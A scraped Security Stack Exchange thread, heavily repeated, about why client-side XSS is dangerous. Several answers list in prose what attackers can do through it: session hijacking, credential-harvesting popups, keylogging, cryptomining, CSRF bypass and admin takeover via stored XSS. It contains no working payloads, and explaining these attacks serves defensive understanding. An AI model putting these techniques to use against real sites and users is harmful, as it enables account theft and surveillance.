How dangerous is XSS The Next CEO of Stack OverflowWhat is DOM based XSS? And How to prevent it?Difference in Web Language Compilation and ExecutionIs this reflected or DOM-based XSS?Dangers of XSS on the server-side vs client-sideHow dangerous is reflected request query strings?HOW is the malicious URL/payload is delivered to the user on a DOM based XSS attack?How does CORS prevent XSS?Is echoing GET parameters into a script tag reflected or DOM based XSS?Burpsuite - finding xss vulnerabilities in the vaadin frameworkWhat is client side non-DOM XSS?
Why did the Drakh emissary look so blurred in S04:E11 "Lines of Communication"?
How does a dynamic QR code work?
Calculate the Mean mean of two numbers
How to implement Comparable so it is consistent with identity-equality
How to compactly explain secondary and tertiary characters without resorting to stereotypes?
Is it OK to decorate a log book cover?
What did the word "leisure" mean in late 18th Century usage?
Is it possible to create a QR code using text?
logical reads on global temp table, but not on session-level temp table
How to show a landlord what we have in savings?
pgfplots: How to draw a tangent graph below two others?
Cannot restore registry to default in Windows 10?
Calculating discount not working
Is it correct to say moon starry nights?
Would a grinding machine be a simple and workable propulsion system for an interplanetary spacecraft?
MT "will strike" & LXX "will watch carefully" (Gen 3:15)?
Salesforce opportunity stages
What happens if you break a law in another country outside of that country?
How can I separate the number from the unit in argument?
Man transported from Alternate World into ours by a Neutrino Detector
Is the offspring between a demon and a celestial possible? If so what is it called and is it in a book somewhere?
How to pronounce fünf in 45
Why was Sir Cadogan fired?
Why doesn't Shulchan Aruch include the laws of destroying fruit trees?
How dangerous is XSS
The Next CEO of Stack OverflowWhat is DOM based XSS? And How to prevent it?Difference in Web Language Compilation and ExecutionIs this reflected or DOM-based XSS?Dangers of XSS on the server-side vs client-sideHow dangerous is reflected request query strings?HOW is the malicious URL/payload is delivered to the user on a DOM based XSS attack?How does CORS prevent XSS?Is echoing GET parameters into a script tag reflected or DOM based XSS?Burpsuite - finding xss vulnerabilities in the vaadin frameworkWhat is client side non-DOM XSS?
I am a software engineer and have been watching a lot of videos about XSS. But I fail to understand how is it dangerous if it runs on the client side and does not execute on the server side which contains the databases, and many important files.
web-application xss vulnerability
edited 17 hours ago
schroeder♦
78.5k30174210
asked 23 hours ago
Sai KumarSai Kumar
3913
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
|
show 1 more comment
I am a software engineer and have been watching a lot of videos about XSS. But I fail to understand how is it dangerous if it runs on the client side and does not execute on the server side which contains the databases, and many important files.
web-application xss vulnerability
edited 17 hours ago
schroeder♦
78.5k30174210
asked 23 hours ago
Sai KumarSai Kumar
3913
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
1
It's as dangerous as a friend lying to you on your face about pretty important stuff. In above analogy friend is genuine web application and face is it User Interface.
– user101
20 hours ago
Are you asking about the dangers to the server, then?
– schroeder♦
17 hours ago
2
What you seem to be missing is that it's dangerous to your user more than to your server.
– jpmc26
10 hours ago
@Schroeder I wanted to know why is xss considered dangerous even though it does not do any harm to the server on which the application is hosted on.
– Sai Kumar
10 hours ago
3
But you are aware that it is dangerous to clients, right?
– schroeder♦
9 hours ago
|
show 1 more comment
I am a software engineer and have been watching a lot of videos about XSS. But I fail to understand how is it dangerous if it runs on the client side and does not execute on the server side which contains the databases, and many important files.
web-application xss vulnerability
edited 17 hours ago
schroeder♦
78.5k30174210
asked 23 hours ago
Sai KumarSai Kumar
3913
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
I am a software engineer and have been watching a lot of videos about XSS. But I fail to understand how is it dangerous if it runs on the client side and does not execute on the server side which contains the databases, and many important files.
web-application xss vulnerability
web-application xss vulnerability
edited 17 hours ago
schroeder♦
78.5k30174210
asked 23 hours ago
Sai KumarSai Kumar
3913
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
edited 17 hours ago
schroeder♦
78.5k30174210
asked 23 hours ago
Sai KumarSai Kumar
3913
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
edited 17 hours ago
schroeder♦
78.5k30174210
edited 17 hours ago
schroeder♦
78.5k30174210
edited 17 hours ago
schroeder♦
78.5k30174210
78.5k30174210
asked 23 hours ago
Sai KumarSai Kumar
3913
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked 23 hours ago
Sai KumarSai Kumar
3913
asked 23 hours ago
Sai KumarSai Kumar
3913
3913
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
New contributor
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
Sai Kumar is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
1
It's as dangerous as a friend lying to you on your face about pretty important stuff. In above analogy friend is genuine web application and face is it User Interface.
– user101
20 hours ago
Are you asking about the dangers to the server, then?
– schroeder♦
17 hours ago
2
What you seem to be missing is that it's dangerous to your user more than to your server.
– jpmc26
10 hours ago
@Schroeder I wanted to know why is xss considered dangerous even though it does not do any harm to the server on which the application is hosted on.
– Sai Kumar
10 hours ago
3
But you are aware that it is dangerous to clients, right?
– schroeder♦
9 hours ago
|
show 1 more comment
1
It's as dangerous as a friend lying to you on your face about pretty important stuff. In above analogy friend is genuine web application and face is it User Interface.
– user101
20 hours ago
Are you asking about the dangers to the server, then?
– schroeder♦
17 hours ago
2
What you seem to be missing is that it's dangerous to your user more than to your server.
– jpmc26
10 hours ago
@Schroeder I wanted to know why is xss considered dangerous even though it does not do any harm to the server on which the application is hosted on.
– Sai Kumar
10 hours ago
3
But you are aware that it is dangerous to clients, right?
– schroeder♦
9 hours ago
1
1
It's as dangerous as a friend lying to you on your face about pretty important stuff. In above analogy friend is genuine web application and face is it User Interface.
– user101
20 hours ago
It's as dangerous as a friend lying to you on your face about pretty important stuff. In above analogy friend is genuine web application and face is it User Interface.
– user101
20 hours ago
Are you asking about the dangers to the server, then?
– schroeder♦
17 hours ago
Are you asking about the dangers to the server, then?
– schroeder♦
17 hours ago
2
2
What you seem to be missing is that it's dangerous to your user more than to your server.
– jpmc26
10 hours ago
What you seem to be missing is that it's dangerous to your user more than to your server.
– jpmc26
10 hours ago
@Schroeder I wanted to know why is xss considered dangerous even though it does not do any harm to the server on which the application is hosted on.
– Sai Kumar
10 hours ago
@Schroeder I wanted to know why is xss considered dangerous even though it does not do any harm to the server on which the application is hosted on.
– Sai Kumar
10 hours ago
3
3
But you are aware that it is dangerous to clients, right?
– schroeder♦
9 hours ago
But you are aware that it is dangerous to clients, right?
– schroeder♦
9 hours ago
|
show 1 more comment
6 Answers
6
active
oldest
votes
Below are the things an attacker can do if there is XSS vulnerability. Content taken from somdev blog
Ad-Jacking - If you manage to get stored XSS on a website, just
inject your ads in it to make money ;)
Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.
Session Hijacking - HTTP cookies can be accessed
by JavaScript if the HTTP ONLY flag is not present in the cookies.
Content Spoofing - JavaScript has full access to client side code of
a web app and hence you can use it show/modify desired content.
Credential Harvesting - The most fun part. You can use a fancy popup
to harvest credentials. WiFi firmware has been updated, re-enter your
credentials to authenticate. Forced Downloads - So the victim isn’t
downloading your malicious flash player from absolutely-safe.com?
Don’t worry, you will have more luck trying to force a download from
the trusted website your victim is visiting.
Crypto Mining - Yes, you
can use the victim’s CPU to mine some bitcoin for you!
Bypassing CSRF
protection - You can make POST requests with JavaScript, you can
collect and submit a CSRF token with JavaScript, what else do you
need?
Keylogging - You know what this is.
Recording Audio - It
requires authorization from the user but you access victim’s
microphone. Thanks to HTML5 and JavaScript.
Taking pictures - It
requires authorization from the user but you access victim’s webcam.
Thanks to HTML5 and JavaScript.
Geo-location - It requires
authorization from the user but you access victim’s Geo-location.
Thanks to HTML5 and JavaScript. Works better with devices with GPS.
Stealing HTML5 web storage data - HTML5 introduced a new feature, web
storage. Now a website can store data in the browser for later use
and of course, JavaScript can access that storage via
window.localStorage() and window.webStorage() Browser & System
Fingerprinting - JavaScript makes it a piece of cake to find your
browser name, version, installed plugins and their versions, your
operating system, architecture, system time, language and screen
resolution.
Network Scanning - Victim’s browser can be abused to scan
ports and hosts with JavaScript.
Crashing Browsers - Yes! You can
crash browser with flooding them with….stuff.
Stealing Information -
Grab information from the webpage and send it to your server. Simple!
Redirecting - You can use javascript to redirect users to a webpage
of your choice.
Tabnapping - Just a fancy version of redirection.
For example, if no keyboard or mouse events have been received for
more than a minute, it could mean that the user is afk and you can
sneakily replace the current webpage with a fake one.
Capturing
Screenshots - Thanks to HTML5 again, now you can take screenshot of a
webpage. Blind XSS detection tools have been doing this before it was
cool.
Perform Actions - You are controlling the browser,
edited 10 hours ago
Anders
49.7k22143164
answered 20 hours ago
GoronGoron
35219
1
So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?
– Sai Kumar
9 hours ago
1
It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.
– Goron
9 hours ago
@SaiKumar Only in that tab.
– immibis
5 hours ago
add a comment |
Attacker controlled code which runs within the context of the web application on the client side has full control over what the client does and can also read the DOM of the HTML page etc. This means it can both steal secrets which are inside this page (passwords etc) and also do things as logged in client (like buy something, send bomb threats in a mail client ...). Note that this kind of activity can often be hidden from the client so that he does not realize that he is currently attacked.
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
add a comment |
When XSS was first becoming widely known in the web application
security community, some professional penetration testers were
inclined to regard XSS as a “lame” vulnerability
source: Web Application Hackers Handbook
XSS is a command injection of the client side, like the other user pointed out, it can result in any action that can be performed by the user. Mostly XSS is used for session hijacking where the attacker using javascript makes the victim transmit session cookies to an attacker-controlled server and from there the attacker can perform "session riding".
But XSS can also result in complete application takeover. Consider a scenario in which you inject javascript and it gets stored. The admin then loads that into a web browser (usually logs or CMS). If an XSS is present there you now have the admin session tokens. That is why XSS can be very dangerous.
edited 17 hours ago
schroeder♦
78.5k30174210
answered 21 hours ago
Vipul NairVipul Nair
979
Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.
– schroeder♦
17 hours ago
Absolutely.I didnt write it because i only wanted to add what steffen wrote.
– Vipul Nair
8 hours ago
add a comment |
Most of the possible consequences of XSS vulnerabilities affect the user, not your server. So if you don't care about your user getting their accounts on your website compromised or your users seeing content on your website which doesn't come from your server, sure, ignore those vulnerabilities.
But if your users have admin rights, then an XSS vulnerability can easily lead to unintentional admin actions. A classic case of that is a log viewer in your admin area which isn't XSS-proof. Some javascript snippets in your access logs might get executed by your admins and perform administrative actions under their account. This is why you sometimes see javascript snippets in the HTTP headers of the bots which try to hack your website.
answered 11 hours ago
PhilippPhilipp
44.4k7112140
add a comment |
An XSS attack is not a danger to the server. It's a danger to the reason you have a server. Not in a technical sense but very much a human one, as any kind of XSS attack originating from your site usually ends with your reputation down the toilet. A few test cases:
- Someone redirects from your site to a fake login page. Now you have a potential mass security breach of user accounts on your site.
- Someone puts a cryptominer on your site. This will make your visitors' machines work overtime and when spotted, makes you look either grossly greedy and/or grossly incompetent as a sysadmin. Neither of which is a good look.
- Someone redirects traffic from your site to a competitor. I shouldn't have to explain why this is bad.
- Someone puts some javascript in there that makes your site unusable or even crash browsers. Again, should be obvious why this is bad.
- Someone puts DDOS code in your site to try take down your site or a third party. If aimed at you, should be obvious why this is bad. If aimed at someone else and your site is deemed culpable, your hosting provider can cut you off if you do not fix your site for breach of contract.
- Someone replaces your ads with their own. If you rely on ad revenue, they're stealing that revenue.
- Someone uses it to snoop on your users. Hel-lo, breach of GDPR.
answered 10 hours ago
520520
36114
add a comment |
It looks like you're looking for danger to the server (including SQL etc.), not the client, so many dangers don't apply.
But there is a danger to the server from what the client is allowed to do on the server. If the client has permission to change the database, so can an attacker. And the same goes for anything a client has permission to do on the server.
answered 18 hours ago
User42User42
1773
Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "
– User42
17 hours ago
add a comment |
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "162"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sai Kumar is a new contributor. Be nice, and check out our Code of Conduct.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f206520%2fhow-dangerous-is-xss%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
6 Answers
6
active
oldest
votes
6 Answers
6
active
oldest
votes
active
oldest
votes
active
oldest
votes
Below are the things an attacker can do if there is XSS vulnerability. Content taken from somdev blog
Ad-Jacking - If you manage to get stored XSS on a website, just
inject your ads in it to make money ;)
Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.
Session Hijacking - HTTP cookies can be accessed
by JavaScript if the HTTP ONLY flag is not present in the cookies.
Content Spoofing - JavaScript has full access to client side code of
a web app and hence you can use it show/modify desired content.
Credential Harvesting - The most fun part. You can use a fancy popup
to harvest credentials. WiFi firmware has been updated, re-enter your
credentials to authenticate. Forced Downloads - So the victim isn’t
downloading your malicious flash player from absolutely-safe.com?
Don’t worry, you will have more luck trying to force a download from
the trusted website your victim is visiting.
Crypto Mining - Yes, you
can use the victim’s CPU to mine some bitcoin for you!
Bypassing CSRF
protection - You can make POST requests with JavaScript, you can
collect and submit a CSRF token with JavaScript, what else do you
need?
Keylogging - You know what this is.
Recording Audio - It
requires authorization from the user but you access victim’s
microphone. Thanks to HTML5 and JavaScript.
Taking pictures - It
requires authorization from the user but you access victim’s webcam.
Thanks to HTML5 and JavaScript.
Geo-location - It requires
authorization from the user but you access victim’s Geo-location.
Thanks to HTML5 and JavaScript. Works better with devices with GPS.
Stealing HTML5 web storage data - HTML5 introduced a new feature, web
storage. Now a website can store data in the browser for later use
and of course, JavaScript can access that storage via
window.localStorage() and window.webStorage() Browser & System
Fingerprinting - JavaScript makes it a piece of cake to find your
browser name, version, installed plugins and their versions, your
operating system, architecture, system time, language and screen
resolution.
Network Scanning - Victim’s browser can be abused to scan
ports and hosts with JavaScript.
Crashing Browsers - Yes! You can
crash browser with flooding them with….stuff.
Stealing Information -
Grab information from the webpage and send it to your server. Simple!
Redirecting - You can use javascript to redirect users to a webpage
of your choice.
Tabnapping - Just a fancy version of redirection.
For example, if no keyboard or mouse events have been received for
more than a minute, it could mean that the user is afk and you can
sneakily replace the current webpage with a fake one.
Capturing
Screenshots - Thanks to HTML5 again, now you can take screenshot of a
webpage. Blind XSS detection tools have been doing this before it was
cool.
Perform Actions - You are controlling the browser,
edited 10 hours ago
Anders
49.7k22143164
answered 20 hours ago
GoronGoron
35219
1
So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?
– Sai Kumar
9 hours ago
1
It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.
– Goron
9 hours ago
@SaiKumar Only in that tab.
– immibis
5 hours ago
add a comment |
Below are the things an attacker can do if there is XSS vulnerability. Content taken from somdev blog
Ad-Jacking - If you manage to get stored XSS on a website, just
inject your ads in it to make money ;)
Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.
Session Hijacking - HTTP cookies can be accessed
by JavaScript if the HTTP ONLY flag is not present in the cookies.
Content Spoofing - JavaScript has full access to client side code of
a web app and hence you can use it show/modify desired content.
Credential Harvesting - The most fun part. You can use a fancy popup
to harvest credentials. WiFi firmware has been updated, re-enter your
credentials to authenticate. Forced Downloads - So the victim isn’t
downloading your malicious flash player from absolutely-safe.com?
Don’t worry, you will have more luck trying to force a download from
the trusted website your victim is visiting.
Crypto Mining - Yes, you
can use the victim’s CPU to mine some bitcoin for you!
Bypassing CSRF
protection - You can make POST requests with JavaScript, you can
collect and submit a CSRF token with JavaScript, what else do you
need?
Keylogging - You know what this is.
Recording Audio - It
requires authorization from the user but you access victim’s
microphone. Thanks to HTML5 and JavaScript.
Taking pictures - It
requires authorization from the user but you access victim’s webcam.
Thanks to HTML5 and JavaScript.
Geo-location - It requires
authorization from the user but you access victim’s Geo-location.
Thanks to HTML5 and JavaScript. Works better with devices with GPS.
Stealing HTML5 web storage data - HTML5 introduced a new feature, web
storage. Now a website can store data in the browser for later use
and of course, JavaScript can access that storage via
window.localStorage() and window.webStorage() Browser & System
Fingerprinting - JavaScript makes it a piece of cake to find your
browser name, version, installed plugins and their versions, your
operating system, architecture, system time, language and screen
resolution.
Network Scanning - Victim’s browser can be abused to scan
ports and hosts with JavaScript.
Crashing Browsers - Yes! You can
crash browser with flooding them with….stuff.
Stealing Information -
Grab information from the webpage and send it to your server. Simple!
Redirecting - You can use javascript to redirect users to a webpage
of your choice.
Tabnapping - Just a fancy version of redirection.
For example, if no keyboard or mouse events have been received for
more than a minute, it could mean that the user is afk and you can
sneakily replace the current webpage with a fake one.
Capturing
Screenshots - Thanks to HTML5 again, now you can take screenshot of a
webpage. Blind XSS detection tools have been doing this before it was
cool.
Perform Actions - You are controlling the browser,
edited 10 hours ago
Anders
49.7k22143164
answered 20 hours ago
GoronGoron
35219
1
So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?
– Sai Kumar
9 hours ago
1
It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.
– Goron
9 hours ago
@SaiKumar Only in that tab.
– immibis
5 hours ago
add a comment |
Below are the things an attacker can do if there is XSS vulnerability. Content taken from somdev blog
Ad-Jacking - If you manage to get stored XSS on a website, just
inject your ads in it to make money ;)
Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.
Session Hijacking - HTTP cookies can be accessed
by JavaScript if the HTTP ONLY flag is not present in the cookies.
Content Spoofing - JavaScript has full access to client side code of
a web app and hence you can use it show/modify desired content.
Credential Harvesting - The most fun part. You can use a fancy popup
to harvest credentials. WiFi firmware has been updated, re-enter your
credentials to authenticate. Forced Downloads - So the victim isn’t
downloading your malicious flash player from absolutely-safe.com?
Don’t worry, you will have more luck trying to force a download from
the trusted website your victim is visiting.
Crypto Mining - Yes, you
can use the victim’s CPU to mine some bitcoin for you!
Bypassing CSRF
protection - You can make POST requests with JavaScript, you can
collect and submit a CSRF token with JavaScript, what else do you
need?
Keylogging - You know what this is.
Recording Audio - It
requires authorization from the user but you access victim’s
microphone. Thanks to HTML5 and JavaScript.
Taking pictures - It
requires authorization from the user but you access victim’s webcam.
Thanks to HTML5 and JavaScript.
Geo-location - It requires
authorization from the user but you access victim’s Geo-location.
Thanks to HTML5 and JavaScript. Works better with devices with GPS.
Stealing HTML5 web storage data - HTML5 introduced a new feature, web
storage. Now a website can store data in the browser for later use
and of course, JavaScript can access that storage via
window.localStorage() and window.webStorage() Browser & System
Fingerprinting - JavaScript makes it a piece of cake to find your
browser name, version, installed plugins and their versions, your
operating system, architecture, system time, language and screen
resolution.
Network Scanning - Victim’s browser can be abused to scan
ports and hosts with JavaScript.
Crashing Browsers - Yes! You can
crash browser with flooding them with….stuff.
Stealing Information -
Grab information from the webpage and send it to your server. Simple!
Redirecting - You can use javascript to redirect users to a webpage
of your choice.
Tabnapping - Just a fancy version of redirection.
For example, if no keyboard or mouse events have been received for
more than a minute, it could mean that the user is afk and you can
sneakily replace the current webpage with a fake one.
Capturing
Screenshots - Thanks to HTML5 again, now you can take screenshot of a
webpage. Blind XSS detection tools have been doing this before it was
cool.
Perform Actions - You are controlling the browser,
edited 10 hours ago
Anders
49.7k22143164
answered 20 hours ago
GoronGoron
35219
Below are the things an attacker can do if there is XSS vulnerability. Content taken from somdev blog
Ad-Jacking - If you manage to get stored XSS on a website, just
inject your ads in it to make money ;)
Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.
Session Hijacking - HTTP cookies can be accessed
by JavaScript if the HTTP ONLY flag is not present in the cookies.
Content Spoofing - JavaScript has full access to client side code of
a web app and hence you can use it show/modify desired content.
Credential Harvesting - The most fun part. You can use a fancy popup
to harvest credentials. WiFi firmware has been updated, re-enter your
credentials to authenticate. Forced Downloads - So the victim isn’t
downloading your malicious flash player from absolutely-safe.com?
Don’t worry, you will have more luck trying to force a download from
the trusted website your victim is visiting.
Crypto Mining - Yes, you
can use the victim’s CPU to mine some bitcoin for you!
Bypassing CSRF
protection - You can make POST requests with JavaScript, you can
collect and submit a CSRF token with JavaScript, what else do you
need?
Keylogging - You know what this is.
Recording Audio - It
requires authorization from the user but you access victim’s
microphone. Thanks to HTML5 and JavaScript.
Taking pictures - It
requires authorization from the user but you access victim’s webcam.
Thanks to HTML5 and JavaScript.
Geo-location - It requires
authorization from the user but you access victim’s Geo-location.
Thanks to HTML5 and JavaScript. Works better with devices with GPS.
Stealing HTML5 web storage data - HTML5 introduced a new feature, web
storage. Now a website can store data in the browser for later use
and of course, JavaScript can access that storage via
window.localStorage() and window.webStorage() Browser & System
Fingerprinting - JavaScript makes it a piece of cake to find your
browser name, version, installed plugins and their versions, your
operating system, architecture, system time, language and screen
resolution.
Network Scanning - Victim’s browser can be abused to scan
ports and hosts with JavaScript.
Crashing Browsers - Yes! You can
crash browser with flooding them with….stuff.
Stealing Information -
Grab information from the webpage and send it to your server. Simple!
Redirecting - You can use javascript to redirect users to a webpage
of your choice.
Tabnapping - Just a fancy version of redirection.
For example, if no keyboard or mouse events have been received for
more than a minute, it could mean that the user is afk and you can
sneakily replace the current webpage with a fake one.
Capturing
Screenshots - Thanks to HTML5 again, now you can take screenshot of a
webpage. Blind XSS detection tools have been doing this before it was
cool.
Perform Actions - You are controlling the browser,
edited 10 hours ago
Anders
49.7k22143164
answered 20 hours ago
GoronGoron
35219
edited 10 hours ago
Anders
49.7k22143164
edited 10 hours ago
Anders
49.7k22143164
edited 10 hours ago
Anders
49.7k22143164
49.7k22143164
answered 20 hours ago
GoronGoron
35219
answered 20 hours ago
GoronGoron
35219
answered 20 hours ago
GoronGoron
35219
35219
1
So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?
– Sai Kumar
9 hours ago
1
It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.
– Goron
9 hours ago
@SaiKumar Only in that tab.
– immibis
5 hours ago
add a comment |
1
So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?
– Sai Kumar
9 hours ago
1
It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.
– Goron
9 hours ago
@SaiKumar Only in that tab.
– immibis
5 hours ago
1
1
So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?
– Sai Kumar
9 hours ago
So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?
– Sai Kumar
9 hours ago
1
1
It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.
– Goron
9 hours ago
It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.
– Goron
9 hours ago
@SaiKumar Only in that tab.
– immibis
5 hours ago
@SaiKumar Only in that tab.
– immibis
5 hours ago
add a comment |
Attacker controlled code which runs within the context of the web application on the client side has full control over what the client does and can also read the DOM of the HTML page etc. This means it can both steal secrets which are inside this page (passwords etc) and also do things as logged in client (like buy something, send bomb threats in a mail client ...). Note that this kind of activity can often be hidden from the client so that he does not realize that he is currently attacked.
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
add a comment |
Attacker controlled code which runs within the context of the web application on the client side has full control over what the client does and can also read the DOM of the HTML page etc. This means it can both steal secrets which are inside this page (passwords etc) and also do things as logged in client (like buy something, send bomb threats in a mail client ...). Note that this kind of activity can often be hidden from the client so that he does not realize that he is currently attacked.
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
add a comment |
Attacker controlled code which runs within the context of the web application on the client side has full control over what the client does and can also read the DOM of the HTML page etc. This means it can both steal secrets which are inside this page (passwords etc) and also do things as logged in client (like buy something, send bomb threats in a mail client ...). Note that this kind of activity can often be hidden from the client so that he does not realize that he is currently attacked.
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
Attacker controlled code which runs within the context of the web application on the client side has full control over what the client does and can also read the DOM of the HTML page etc. This means it can both steal secrets which are inside this page (passwords etc) and also do things as logged in client (like buy something, send bomb threats in a mail client ...). Note that this kind of activity can often be hidden from the client so that he does not realize that he is currently attacked.
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
answered 22 hours ago
Steffen UllrichSteffen Ullrich
120k15209276
120k15209276
add a comment |
add a comment |
When XSS was first becoming widely known in the web application
security community, some professional penetration testers were
inclined to regard XSS as a “lame” vulnerability
source: Web Application Hackers Handbook
XSS is a command injection of the client side, like the other user pointed out, it can result in any action that can be performed by the user. Mostly XSS is used for session hijacking where the attacker using javascript makes the victim transmit session cookies to an attacker-controlled server and from there the attacker can perform "session riding".
But XSS can also result in complete application takeover. Consider a scenario in which you inject javascript and it gets stored. The admin then loads that into a web browser (usually logs or CMS). If an XSS is present there you now have the admin session tokens. That is why XSS can be very dangerous.
edited 17 hours ago
schroeder♦
78.5k30174210
answered 21 hours ago
Vipul NairVipul Nair
979
Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.
– schroeder♦
17 hours ago
Absolutely.I didnt write it because i only wanted to add what steffen wrote.
– Vipul Nair
8 hours ago
add a comment |
When XSS was first becoming widely known in the web application
security community, some professional penetration testers were
inclined to regard XSS as a “lame” vulnerability
source: Web Application Hackers Handbook
XSS is a command injection of the client side, like the other user pointed out, it can result in any action that can be performed by the user. Mostly XSS is used for session hijacking where the attacker using javascript makes the victim transmit session cookies to an attacker-controlled server and from there the attacker can perform "session riding".
But XSS can also result in complete application takeover. Consider a scenario in which you inject javascript and it gets stored. The admin then loads that into a web browser (usually logs or CMS). If an XSS is present there you now have the admin session tokens. That is why XSS can be very dangerous.
edited 17 hours ago
schroeder♦
78.5k30174210
answered 21 hours ago
Vipul NairVipul Nair
979
Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.
– schroeder♦
17 hours ago
Absolutely.I didnt write it because i only wanted to add what steffen wrote.
– Vipul Nair
8 hours ago
add a comment |
When XSS was first becoming widely known in the web application
security community, some professional penetration testers were
inclined to regard XSS as a “lame” vulnerability
source: Web Application Hackers Handbook
XSS is a command injection of the client side, like the other user pointed out, it can result in any action that can be performed by the user. Mostly XSS is used for session hijacking where the attacker using javascript makes the victim transmit session cookies to an attacker-controlled server and from there the attacker can perform "session riding".
But XSS can also result in complete application takeover. Consider a scenario in which you inject javascript and it gets stored. The admin then loads that into a web browser (usually logs or CMS). If an XSS is present there you now have the admin session tokens. That is why XSS can be very dangerous.
edited 17 hours ago
schroeder♦
78.5k30174210
answered 21 hours ago
Vipul NairVipul Nair
979
When XSS was first becoming widely known in the web application
security community, some professional penetration testers were
inclined to regard XSS as a “lame” vulnerability
source: Web Application Hackers Handbook
XSS is a command injection of the client side, like the other user pointed out, it can result in any action that can be performed by the user. Mostly XSS is used for session hijacking where the attacker using javascript makes the victim transmit session cookies to an attacker-controlled server and from there the attacker can perform "session riding".
But XSS can also result in complete application takeover. Consider a scenario in which you inject javascript and it gets stored. The admin then loads that into a web browser (usually logs or CMS). If an XSS is present there you now have the admin session tokens. That is why XSS can be very dangerous.
edited 17 hours ago
schroeder♦
78.5k30174210
answered 21 hours ago
Vipul NairVipul Nair
979
edited 17 hours ago
schroeder♦
78.5k30174210
edited 17 hours ago
schroeder♦
78.5k30174210
edited 17 hours ago
schroeder♦
78.5k30174210
78.5k30174210
